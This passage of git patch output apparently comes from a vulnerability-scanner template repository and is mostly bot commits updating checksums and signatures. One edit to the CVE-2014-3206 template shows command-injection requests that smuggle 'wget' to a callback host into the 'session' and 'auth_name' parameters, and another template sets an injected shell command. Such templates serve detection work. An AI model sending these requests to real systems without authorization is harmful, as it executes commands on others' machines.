http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564 http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db +http/technologies/boa-web-server.yaml:e35a4938390a7c71865787c3fad9ad85cdd34d89 http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83 http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31 @@ -8536,7 +8538,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fc5915d967b1a21dcfd5a6b1d76d4dd1d5a43871 +templates-checksum.txt:4c32ab29cb43609d0ff62d6902740a916ef16476 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4486608a7812a6164d6de2db7309351f07e2f3d1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:17 +0000 Subject: [PATCH 354/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 353817cd75..49cfe18ccc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' + - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' From 9dfe9ed11163b09a6a26f4cde13748e5110ee0a6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:49 +0000 Subject: [PATCH 355/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 49cfe18ccc..f728a27435 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -34,6 +34,7 @@ on: - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' + - 'http/technologies/boa-web-server.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/statamic-detect.yaml' From 611a91dd162f1e670baa609fb4681d8d0deface4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:12:15 +0000 Subject: [PATCH 356/375] Auto Template Signing [Wed May 15 08:12:15 UTC 2024] :robot: --- http/exposed-panels/fortinet/f5-next-central-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 02873fe6ad..85944c6335 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100b3c8cbebbf5b6db93eb84a58ba8a629736bd27b2715e4e907afe8d4c16ffe808022100efb3278f5f84739a8835ab53f02255849df148e45d16593a8cf6655c65b51ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d866333971b1434edce371df793c3d87fd6e2e1c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:42:32 +0530 Subject: [PATCH 357/375] Update castel-digital-sqli.yaml --- http/vulnerabilities/other/castel-digital-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index 222857b3da..b29c982920 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -27,11 +27,11 @@ http: - | GET /restrito/ HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word + part: body_2 words: - "Banner" - "Construtoras" From ccead404f83465b5fcdee9d86afae67c0c17168b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:15:50 +0000 Subject: [PATCH 358/375] Auto Generated New Template Addition List [Wed May 15 08:15:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 119242db54..903417746e 100644 --- a/.new-additions +++ b/.new-additions @@ -36,4 +36,5 @@ http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +http/vulnerabilities/other/castel-digital-sqli.yaml javascript/enumeration/checkpoint-firewall-enum.yaml From 9b7b7d0f2ad22a607e00be0a40aff88b4e6cd2cf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:16:00 +0000 Subject: [PATCH 359/375] Auto Generated Templates Checksum [Wed May 15 08:16:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 864cff7685..093de95984 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3820,7 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8 -http/exposed-panels/fortinet/f5-next-central-manager.yaml:d762378ab72ddb5aa7d2efdcf5a81c9a04b5eddf +http/exposed-panels/fortinet/f5-next-central-manager.yaml:88b7c61b91dcb46cb80694570e9f6dc214b91f08 http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823 http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8 http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff @@ -7651,6 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50 http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e +http/vulnerabilities/other/castel-digital-sqli.yaml:a7cf8f337e5bc23c47872d74f16cebaf7f83fb39 http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 @@ -8538,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4c32ab29cb43609d0ff62d6902740a916ef16476 +templates-checksum.txt:29023639b8d641762d7f4bd14ce9aaae7228d6fd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 46a318af2aa0dd3401da168143fb9e3d6b7815d5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:16:39 +0000 Subject: [PATCH 360/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f728a27435..6900fcf26b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' + - 'http/vulnerabilities/other/castel-digital-sqli.yaml' - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: From 71fb6cee7078de6af3e14b066050ab16074d5a5b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:17:42 +0000 Subject: [PATCH 361/375] Auto Template Signing [Wed May 15 08:17:42 UTC 2024] :robot: --- http/technologies/boa-web-server.yaml | 1 + http/vulnerabilities/other/castel-digital-sqli.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index 109d3bcf30..53c893383c 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -35,3 +35,4 @@ http: part: header kval: - Server +# digest: 4a0a0047304502202169ec1f1b72425327554db7f1a270b4560a3e56b3f12e0cde1f693f8031958702210083f4edf96fefff0f4aaa15cc8b8070c70f6d8fe222ecb2b68da0734125597713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml index b29c982920..53a9a6176f 100644 --- a/http/vulnerabilities/other/castel-digital-sqli.yaml +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d80a22d4cf273f6271529eb7a45f6340388cc7b72da5125e620e24e141c66ac4022100dab34630a0cb5708cd7153359df8c7bbe5b45c9c7ee7cb0f076e31a29b76023d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b9a8d3901eecd0bcb8b0119ee94a0dab9b050857 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 15 May 2024 20:48:11 +0530 Subject: [PATCH 362/375] misc update --- http/cves/2014/CVE-2014-3206.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 17c94b7d1a..a84e26cb6c 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -12,7 +12,6 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 - - https://www.exploit-db.com/exploits/33159/ - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -31,15 +30,14 @@ info: http: - raw: - | - GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - | - GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - unsafe: true matchers: - type: word part: interactsh_protocol From f2e4bc8d32ac25e2abe8f1c6858b1793183aba89 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 15:18:47 +0000 Subject: [PATCH 364/375] Auto Generated Templates Checksum [Wed May 15 15:18:47 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 093de95984..6077852c47 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1117,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee -http/cves/2014/CVE-2014-3206.yaml:5bcd720008ba2297db841385a8f54f07215edf17 +http/cves/2014/CVE-2014-3206.yaml:10b81c432a045166afa4da6978731d3b115102f7 http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e @@ -6634,7 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71 http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564 http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db -http/technologies/boa-web-server.yaml:e35a4938390a7c71865787c3fad9ad85cdd34d89 +http/technologies/boa-web-server.yaml:f0f198ec1d26c859c0727b2b72fb8f4ed399a803 http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83 http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31 @@ -7651,7 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50 http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e -http/vulnerabilities/other/castel-digital-sqli.yaml:a7cf8f337e5bc23c47872d74f16cebaf7f83fb39 +http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29023639b8d641762d7f4bd14ce9aaae7228d6fd +templates-checksum.txt:29fad74529fa11c3c7395ce26d2cae41e760637d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a1d26d95828e409054b1f0af93fe678cb1b6e826 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 15:20:31 +0000 Subject: [PATCH 365/375] Auto Template Signing [Wed May 15 15:20:31 UTC 2024] :robot: --- http/cves/2014/CVE-2014-3206.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index a84e26cb6c..1eef11da3d 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 79a126c4605347aad4a24b10db579055c7afe482 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 16 May 2024 03:31:18 +0530 Subject: [PATCH 366/375] remove authenticated tag --- http/cves/2022/CVE-2022-33891.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 0e8cd9ebfd..8ee883ede9 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: spark shodan-query: title:"Spark Master at" - tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm + tags: cve2022,cve,apache,spark,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" @@ -45,4 +45,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 From b5ffd641a5d7f977536296d2ede1b3c41ea0c8ae Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 04:07:24 +0000 Subject: [PATCH 368/375] Auto Generated Templates Checksum [Thu May 16 04:07:24 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6077852c47..7766f5a9c3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1117,7 +1117,7 @@ http/cves/2014/CVE-2014-2383.yaml:60182a283fc602cd74b0652577d114cc921837a7 http/cves/2014/CVE-2014-2908.yaml:ba4bad2d7e97fd75e9cb049b5bc2175e4e274b8c http/cves/2014/CVE-2014-2962.yaml:bda481d04555d454bbc3ecced9906fcaf12801c7 http/cves/2014/CVE-2014-3120.yaml:3cf0983b299bbdf24b5f1ed3693a8cb0e69783ee -http/cves/2014/CVE-2014-3206.yaml:10b81c432a045166afa4da6978731d3b115102f7 +http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 http/cves/2014/CVE-2014-3744.yaml:ef82571e3fd9947c935fb978114e323826edf9a6 http/cves/2014/CVE-2014-4210.yaml:b58d6efe179c70093be240210323d92369e1028e @@ -2713,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823 http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703 -http/cves/2022/CVE-2022-33891.yaml:8f81f948758e19f4115f39eb1709b074d2dae3ff +http/cves/2022/CVE-2022-33891.yaml:7f018c89e7ae99be6d89f1fe0f774bf743a734dc http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6 http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29fad74529fa11c3c7395ce26d2cae41e760637d +templates-checksum.txt:42fdaf7e590824421c1c010924196a338fe81a1f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a0c375fad688e62c4af578a44e652858a12863f3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 04:09:05 +0000 Subject: [PATCH 369/375] Auto Template Signing [Thu May 16 04:09:05 UTC 2024] :robot: --- http/cves/2022/CVE-2022-33891.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 8ee883ede9..f24ba6dee7 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -45,4 +45,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 003239fa7fb00dbb85cd062299b9560d1c523f12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 05:44:23 +0000 Subject: [PATCH 371/375] Auto Generated Templates Checksum [Thu May 16 05:44:23 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7766f5a9c3..7d99e9b8d7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1171,7 +1171,7 @@ http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 -http/cves/2015/CVE-2015-2863.yaml:ec18b83f753cde2e1efedc78605d4609de00b044 +http/cves/2015/CVE-2015-2863.yaml:e886adc4ab34cbe416003b6df1df1e2143034e1c http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 @@ -2713,7 +2713,7 @@ http/cves/2022/CVE-2022-32771.yaml:03f39391c095a08e62741ce113c743f4517b8823 http/cves/2022/CVE-2022-32772.yaml:da27806050d52e5cac3989730b256c6f4509314c http/cves/2022/CVE-2022-33119.yaml:ff5573e49a471b38a8309236950429441246dfab http/cves/2022/CVE-2022-33174.yaml:fdf252755679cf8edbb5d3bd76a2e3318c38b703 -http/cves/2022/CVE-2022-33891.yaml:7f018c89e7ae99be6d89f1fe0f774bf743a734dc +http/cves/2022/CVE-2022-33891.yaml:be15239c35fe6650ca82d85b304b20132ea20b4e http/cves/2022/CVE-2022-33901.yaml:ad281903ad2b3a9d2612e85fd9668f248e915a8b http/cves/2022/CVE-2022-33965.yaml:3739b3179daf3df8780e204c3eb4c3b981cf15d6 http/cves/2022/CVE-2022-34045.yaml:3db1aeeb2d125c974bf12bbcfa88b3011d00093d @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:42fdaf7e590824421c1c010924196a338fe81a1f +templates-checksum.txt:25bd19e132c2fce0b56fadd4f103873df3529fea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7298f614886ba09431b9b59388b5afd846306f38 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 05:46:07 +0000 Subject: [PATCH 372/375] Auto Template Signing [Thu May 16 05:46:07 UTC 2024] :robot: --- http/cves/2015/CVE-2015-2863.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index b0ac2537b4..15283777a9 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 -# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d2a37c6eb68a653c40afd87277f8343eb3e10c0bdd4316cd611f7ebc1e852ba022079d43910950fd7200f43f450956b7541df0fe79b603c2941ddc6ac3e7a2bb177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5fd0a4c24e1f39e11a694a565432fefaae5efab7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 07:48:39 +0000 Subject: [PATCH 374/375] Auto Generated Templates Checksum [Thu May 16 07:48:39 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7d99e9b8d7..a519f39ddc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -201,7 +201,7 @@ dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28 dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5 dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f -dast/vulnerabilities/redirect/open-redirect.yaml:0e16729d72a4b492267144a21d378c118dd38195 +dast/vulnerabilities/redirect/open-redirect.yaml:fe71f239a2fa403c11e86a54ec0f5685020f43bf dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507 dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af @@ -1171,7 +1171,7 @@ 